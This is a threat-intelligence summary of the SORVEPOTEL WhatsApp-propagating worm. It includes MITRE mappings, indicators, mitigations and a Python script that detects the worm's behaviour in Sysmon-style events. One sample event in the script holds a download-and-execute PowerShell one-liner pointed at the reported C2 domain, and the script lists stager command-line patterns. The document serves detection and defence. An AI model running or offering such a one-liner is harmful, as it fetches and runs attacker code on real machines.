Full Report
Brazilian users have emerged as the target of a new self-propagating malware dubbed SORVEPOTEL that spreads via the popular messaging app WhatsApp. The campaign, codenamed Water Saci by Trend Micro, weaponizes users' trust in the platform to extend its reach across Windows systems; the researchers add that the attack is "engineered for speed and propagation" rather than data theft or ransomware. "SORVEPOTEL has
Analysis Summary
# Tool/Technique: SORVEPOTEL (Water Saci Campaign)
## Overview
SORVEPOTEL is a self-propagating malware targeting Windows users, primarily distributed via convincing phishing messages sent through WhatsApp. The campaign, codenamed "Water Saci," is engineered for rapid, large-scale propagation through automated exploitation of active WhatsApp Web sessions rather than focusing on typical objectives like data exfiltration or ransomware.
## Technical Details
- Type: Malware family
- Platform: Windows
- Capabilities: Self-propagation via WhatsApp Web, downloading and executing secondary payloads (including banking activity monitoring shellcode), establishing persistence, contacting C2 servers.
- First Seen: October 03, 2025
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1566 - Phishing
- T1566.003 - Spearphishing via Service (lure ZIP delivered through WhatsApp)
- T1566.001 - Spearphishing Attachment (where the same lure is delivered by email)
- TA0002 - Execution
- T1204.002 - User Execution: Malicious File (victim opens the LNK inside the ZIP)
- T1059.001 - Command and Scripting Interpreter: PowerShell
- TA0003 - Persistence
- T1547 - Boot or Logon Autostart Execution
- T1547.001 - Registry Run Keys / Startup Folder (batch script placed in the Startup folder)
- TA0005 - Defense Evasion
- T1620 - Reflective Code Loading (.NET DLL loaded in memory by the PowerShell stage)
- T1055 - Process Injection (banking-monitor shellcode injected into `powershell_ise.exe`)
- T1027 - Obfuscated Files or Information (plausible for the PowerShell stages, but not confirmed by the report)
- TA0007 - Discovery
- T1518.001 - Software Discovery: Security Software Discovery (process scan for debugger and reverse-engineering tool names)
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (used for C2 communication)
- T1105 - Ingress Tool Transfer (later stages fetched from the C2 servers)
## Functionality
### Core Capabilities
- **Initial Infection Vector:** Spreads via malicious ZIP file attachments delivered through WhatsApp messages (and potentially email) masquerading as receipts or health application files.
- **Execution Chain:** Initial infection starts when the victim opens an LNK file from the ZIP; the LNK launches a PowerShell script that fetches the main payload.
- **Persistence:** Installs itself in the Windows Startup folder to ensure execution upon system reboot via a batch script.
- **Propagation:** If WhatsApp Web is detected as active, the malware automatically sends the malicious ZIP attachment to all contacts and groups associated with the compromised user account.
- **C2 Communication:** Executes a PowerShell command to contact C2 servers for further instructions or components.
### Advanced Features
- **WhatsApp Session Hijacking:** Specifically designed to exploit active WhatsApp Web sessions for automated, high-volume spam spreading.
- **Multi-Stage Payload:** Downloads a PowerShell script that reflectively loads a .NET DLL from the C2 server.
- **Shellcode Injection:** The DLL fetches shellcode designed to monitor banking-related activity, injecting it into the `powershell_ise.exe` process.
- **Anti-Analysis:** Before dropping the subsequent stages (Maverick.StageTwo and a WhatsApp hijacking DLL), the DLL scans the names of running processes for strings associated with debuggers and reverse-engineering tools and aborts if any are found.
- **C2 Redundancy:** Can communicate with more than one C2 server, so blocking a single domain does not stop the chain.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: Malicious ZIP attachments (masquerading as receipts/app files), LNK file, Batch script installer, PowerShell script, .NET DLL, Maverick.StageTwo.
- Registry Keys: None reported. Persistence uses the on-disk Startup folder (for the current user, `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup`) rather than a Run key, so hunt for unexpected `.bat` or `.lnk` files there instead of in the registry.
- Network Indicators:
- `sorvetenopoate[.]com` (Used for initial payload retrieval)
- `zapgrande[.]com` (Used to fetch StageTwo components)
- Behavioral Indicators: Excessive volume of WhatsApp messages sent from an account, execution chains involving LNK files leading to PowerShell, process injection into `powershell_ise.exe`.
## Associated Threat Actors
- Not explicitly named, but associated with the "Water Saci" campaign.
## Detection Methods
- Signature-based detection: Signatures for specific hashes or file names associated with the payloads.
- Behavioral detection: Monitoring for execution chains originating from LNK files spawning PowerShell, dynamic process injection into `powershell_ise.exe`, and rapid, automated sending of messages via WhatsApp Web API/sessions.
- YARA rules: Potentially applicable to detect strings or structures within the shellcode or DLLs.
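The behavioural checks listed above, written out as an added example (this is not Trend Micro's detection logic or any vendor's rule set). It runs over Sysmon-style event records: EventID 1 (process creation) for the LNK-to-PowerShell download chain, EventID 8 (CreateRemoteThread) for injection into `powershell_ise.exe`, EventID 11 (file creation) for Startup-folder persistence, and EventID 22 (DNS query) for the two domains in the Indicators section. The sample events, user name, command line and file names are constructed for illustration; the field names follow Sysmon's, but real telemetry carries many more fields.

```python
"""Behavioural triage for the SORVEPOTEL execution chain over Sysmon-style
event records.

Added example for this summary; it is not Trend Micro's detection logic.
Events are CONSTRUCTED to mimic Sysmon field names (EventID 1 process
creation, 8 CreateRemoteThread, 11 file creation, 22 DNS query); the
command-line, user and path values are illustrative, not captured samples.
"""
from dataclasses import dataclass
from typing import Dict, List

# Network indicators from the report, kept defanged in source and refanged
# only for matching against DNS telemetry.
KNOWN_C2 = {d.replace("[.]", ".") for d in ("sorvetenopoate[.]com", "zapgrande[.]com")}

# Per-user Startup folder suffix (T1547.001); paths are lower-cased before matching.
STARTUP_FOLDER = "\\microsoft\\windows\\start menu\\programs\\startup\\"
INJECTION_TARGET = "powershell_ise.exe"
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Command-line fragments typical of a download-and-execute stager.
DOWNLOAD_MARKERS = ("downloadstring", "invoke-webrequest", "iwr ", "iex", "-enc")


@dataclass
class Event:
    event_id: int
    fields: Dict[str, str]


def _basename(path: str) -> str:
    """Last path component of a Windows path."""
    return path.rsplit("\\", 1)[-1]


def detect(events: List[Event]) -> List[str]:
    """Return one finding string per event that matches a SORVEPOTEL behaviour."""
    findings: List[str] = []
    for ev in events:
        flds = {k.lower(): v.lower() for k, v in ev.fields.items()}
        if ev.event_id == 1:
            image = _basename(flds.get("image", ""))
            parent = _basename(flds.get("parentimage", ""))
            cmd = flds.get("commandline", "")
            # LNK opened from the ZIP: explorer.exe spawns a script host whose
            # command line fetches the next stage.
            if parent == "explorer.exe" and image in SCRIPT_HOSTS \
                    and any(m in cmd for m in DOWNLOAD_MARKERS):
                findings.append(f"lnk-to-{image} download chain: {cmd[:70]}")
        elif ev.event_id == 8:
            target = _basename(flds.get("targetimage", ""))
            source = _basename(flds.get("sourceimage", ""))
            # Shellcode injection into powershell_ise.exe (T1055).
            if target == INJECTION_TARGET:
                findings.append(f"remote thread in {target} from {source}")
        elif ev.event_id == 11:
            path = flds.get("targetfilename", "")
            # Batch/LNK dropped into the Startup folder (T1547.001).
            if STARTUP_FOLDER in path and path.endswith((".bat", ".cmd", ".lnk", ".vbs")):
                findings.append(f"startup-folder persistence: {path}")
        elif ev.event_id == 22:
            q = flds.get("queryname", "")
            # Exact or subdomain match against the report's C2 domains.
            if q in KNOWN_C2 or any(q.endswith("." + d) for d in KNOWN_C2):
                findings.append(f"dns query to known water saci domain: {q}")
    return findings


# Constructed events: one benign process launch and one benign DNS query are
# included so the checks are seen to discriminate, not just fire.
SAMPLE_EVENTS = [
    Event(1, {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "ParentImage": r"C:\Windows\explorer.exe",
              "CommandLine": "powershell.exe -w hidden -c IEX (New-Object Net.WebClient)"
                             ".DownloadString('http://sorvetenopoate.com/stage')"}),
    Event(1, {"Image": r"C:\Windows\System32\notepad.exe",
              "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"}),
    Event(11, {"TargetFilename": r"C:\Users\ana\AppData\Roaming\Microsoft\Windows"
                                 r"\Start Menu\Programs\Startup\update.bat"}),
    Event(8, {"SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "TargetImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe"}),
    Event(22, {"QueryName": "cdn.zapgrande.com"}),
    Event(22, {"QueryName": "www.microsoft.com"}),
]

if __name__ == "__main__":
    for line in detect(SAMPLE_EVENTS):
        print(line)
```

The explorer.exe parent check is deliberately narrow: a LNK launched from an archive or the Desktop is almost always a child of the shell, whereas scheduled or service-driven PowerShell has a different parent. In production the `DOWNLOAD_MARKERS` list should be tuned against the estate's legitimate administrative scripts, and the `.lnk` path in the ZIP itself (EventID 11 under the user's temp or Downloads folder) is a further pivot point not shown here.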
## Mitigation Strategies
- **User Awareness:** Educate users about unsolicited attachments, especially those embedded in WhatsApp messages, even from trusted contacts.
- **Endpoint Security:** Use strong endpoint protection capable of detecting suspicious script execution (PowerShell abuse) and process injection.
- **Account Abuse Signals:** Because the worm sends the lure to every contact and group of the compromised account, it generates spam at a rate that violates WhatsApp's terms of service and commonly results in the account being banned. Treat a sudden ban or a burst of outgoing messages as an incident signal, not merely a policy problem.
- **Network Monitoring:** Block and alert on outbound connections and DNS queries to the known C2 domains listed above; because the malware can fall back to more than one server, blocking a single domain does not by itself stop the chain.
- **Application Restriction:** Limit use of WhatsApp Desktop/Web in high-security environments if possible, or monitor sessions closely.
## Related Tools/Techniques
- Worm-style propagation through a legitimate service's contact list, as seen historically in email and instant-messaging worms.
- Execution via LNK files, a common initial stage for dropper malware.